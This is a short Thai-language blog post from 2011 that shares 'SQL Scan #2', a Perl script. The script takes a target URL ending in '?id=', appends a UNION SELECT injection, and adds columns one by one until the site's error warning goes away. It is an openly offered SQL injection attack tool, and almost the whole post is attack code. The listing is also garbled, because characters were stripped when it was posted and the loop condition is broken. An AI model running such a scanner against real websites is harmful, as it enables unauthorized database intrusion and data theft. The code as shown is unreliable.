วันพุธที่ 9 กุมภาพันธ์ พ.ศ. 2554

[Perl] SQL Scan #2

SQL Scan แบบนี้ คาดว่าน่าจะใช้ได้ดีกว่าแบบเดิมอยู่นะ
ดูโค้ดดีๆนะครับ เพราะตรงข้อความไหนที่มีเครื่องหมาย 'มากกว่า' หรือ 'น้อยกว่า' อยู่มันจะไม่ติด ก็ให้ไปดูโค้ดเอาใน pastebin เอาละกัน

SOURCE CODE : http://pastebin.com/MyH0kj0a

## SQL Scan #2 ##
use LWP::UserAgent;
print "SQL Injection\n[+] Target \"www.xxx.xxx/index.php?id=\" = ";
chomp($target=);
@target=split(//,$target);
while ($target[$#target]=~/[0-9]/ || $target[$#target]=~/-/) {
pop(@target);
}
$target=join('',@target);
unless ($target=~/^http:\/\//) {
$target='http://'.$target;
}
print "[+] Scan ",$target,"\n";
$target.="-1+UNION+SELECT+1";
$oritarget=$target;
chop($oritarget);
print "[] Scan : 1\n";
$agent=LWP::UserAgent->new;
SCAN : for ($i=2;$i<50 i="">
$content=$agent->get($target)->content;
unless ($content=~/Warning/) {
print "[+] Found : $target";
last SCAN;
}
print "[] Scan : ",$i,"\n";
$target=$target.",".$i;
}
print "[-] Not found";

ไม่มีความคิดเห็น:

แสดงความคิดเห็น